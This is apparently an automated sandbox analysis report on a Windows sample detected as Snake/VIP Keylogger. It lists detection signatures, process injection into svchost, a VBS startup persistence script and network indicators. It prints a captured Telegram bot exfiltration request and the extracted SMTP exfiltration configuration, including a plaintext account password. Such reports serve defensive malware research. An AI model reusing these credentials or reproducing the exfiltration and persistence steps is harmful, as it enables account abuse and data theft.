
Windows Analysis Report
B7N48hmO78.exe

Overview

General Information

Sample name: B7N48hmO78.exe (renamed because the original name is a hash value)
Original sample name: 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe
Analysis ID: 1587603
MD5: 80a64f0b8df55d637e135f0eb4fb6b70
SHA1: f491fc184d0f15d789e81577e47446478c10ed53
SHA256: 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8
Tags: exe, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • B7N48hmO78.exe (PID: 1812 cmdline: "C:\Users\user\Desktop\B7N48hmO78.exe" MD5: 80A64F0B8DF55D637E135F0EB4FB6B70)
    • demonetised.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\B7N48hmO78.exe" MD5: 80A64F0B8DF55D637E135F0EB4FB6B70)
      • svchost.exe (PID: 2684 cmdline: "C:\Users\user\Desktop\B7N48hmO78.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • wscript.exe (PID: 6176 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • demonetised.exe (PID: 7164 cmdline: "C:\Users\user\AppData\Local\inhumate\demonetised.exe" MD5: 80A64F0B8DF55D637E135F0EB4FB6B70)
      • svchost.exe (PID: 6572 cmdline: "C:\Users\user\AppData\Local\inhumate\demonetised.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author
00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0x361a0:$a1: get_encryptedPassword
  • 0x36174:$a2: get_encryptedUsername
  • 0x36238:$a3: get_timePasswordChanged
  • 0x36150:$a4: get_passwordField
  • 0x361b6:$a5: set_encryptedPassword
  • 0x35f83:$a7: get_logins
  • 0x3185f:$a10: KeyLoggerEventArgs
  • 0x3182e:$a11: KeyLoggerEventArgsEventHandler
  • 0x36057:$a13: _encryptedPassword
Source | Rule | Description | Author
3.2.svchost.exe.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  Strings:
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 0E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
6.3.svchost.exe.305df20.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
6.3.svchost.exe.305df20.0.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
6.3.svchost.exe.305df20.0.raw.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
6.3.svchost.exe.305df20.0.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , ProcessId: 6176, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\B7N48hmO78.exe", CommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", ParentImage: C:\Users\user\AppData\Local\inhumate\demonetised.exe, ParentProcessId: 6488, ParentProcessName: demonetised.exe, ProcessCommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", ProcessId: 2684, ProcessName: svchost.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , ProcessId: 6176, ProcessName: wscript.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\B7N48hmO78.exe", CommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", ParentImage: C:\Users\user\AppData\Local\inhumate\demonetised.exe, ParentProcessId: 6488, ParentProcessName: demonetised.exe, ProcessCommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", ProcessId: 2684, ProcessName: svchost.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\inhumate\demonetised.exe, ProcessId: 6488, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T15:33:44.402670+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 104.21.32.1 | 443 | TCP
2025-01-10T15:33:47.086336+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 104.21.32.1 | 443 | TCP
2025-01-10T15:33:48.381258+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49712 | 104.21.32.1 | 443 | TCP
2025-01-10T15:33:51.020949+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 104.21.32.1 | 443 | TCP
2025-01-10T15:33:52.334346+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49718 | 104.21.32.1 | 443 | TCP
2025-01-10T15:33:56.258742+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49732 | 104.21.32.1 | 443 | TCP
2025-01-10T15:33:57.606888+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49744 | 104.21.32.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T15:33:42.225455+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 132.226.247.73 | 80 | TCP
2025-01-10T15:33:43.772377+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 132.226.247.73 | 80 | TCP
2025-01-10T15:33:45.147400+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 132.226.247.73 | 80 | TCP
2025-01-10T15:33:53.819335+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49720 | 132.226.247.73 | 80 | TCP
2025-01-10T15:33:55.694292+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49720 | 132.226.247.73 | 80 | TCP
2025-01-10T15:33:57.024547+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49739 | 132.226.247.73 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T15:33:54.590569+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49722 | 149.154.167.220 | 443 | TCP
2025-01-10T15:34:06.345035+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49812 | 149.154.167.220 | 443 | TCP


AV Detection

Source: 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587", "Version": "4.4"}
Source: 6.2.svchost.exe.7b00000.4.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Virustotal: Detection: 73%
Source: B7N48hmO78.exe | Virustotal: Detection: 73%
Source: B7N48hmO78.exe | ReversingLabs: Detection: 79%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Joe Sandbox ML: detected
Source: B7N48hmO78.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: B7N48hmO78.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49725 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: Binary string: _.pdb | source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: demonetised.exe, 00000002.00000003.2085085714.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2085935423.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2202790607.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2203800929.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: demonetised.exe, 00000002.00000003.2085085714.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2085935423.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2202790607.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2203800929.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E26CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E26CA9
Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00E260DD
Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00E263F9
Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E2EB60
Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E2F5FA
Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E2F56F FindFirstFileW,FindClose,0_2_00E2F56F
Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E31B2F
Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E31C8A
Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E31F94
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D66CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D66CA9
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00D660DD
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00D663F9
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D6EB60
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00D6F5FA
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D6F56F FindFirstFileW,FindClose,2_2_00D6F56F
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71B2F
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71C8A
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D71F94
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081AE534h | 3_2_081AE288
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 3_2_081A0856
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 3_2_081A0040
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081AFAECh | 3_2_081AF840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081ACF7Ch | 3_2_081ACCD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081A3206h | 3_2_081A3134
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081AD3D4h | 3_2_081AD128
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081A2834h | 3_2_081A2580
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081AD82Ch | 3_2_081AD580
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081ADC84h | 3_2_081AD9D8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081A3206h | 3_2_081A2DE8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081A3206h | 3_2_081A2DE3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081AE0DCh | 3_2_081ADE30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 3_2_081A0676
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081AE98Ch | 3_2_081AE6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081AEDE4h | 3_2_081AEB38
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081A0D10h | 3_2_081A0B30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081A169Ah | 3_2_081A0B30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081AF23Ch | 3_2_081AEF90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then jmp 081AF694h | 3_2_081AF3E8

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49722 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49812 -> 149.154.167.220:443
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 104.21.32.1 443
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 149.154.167.220 443
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 132.226.247.73 80
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
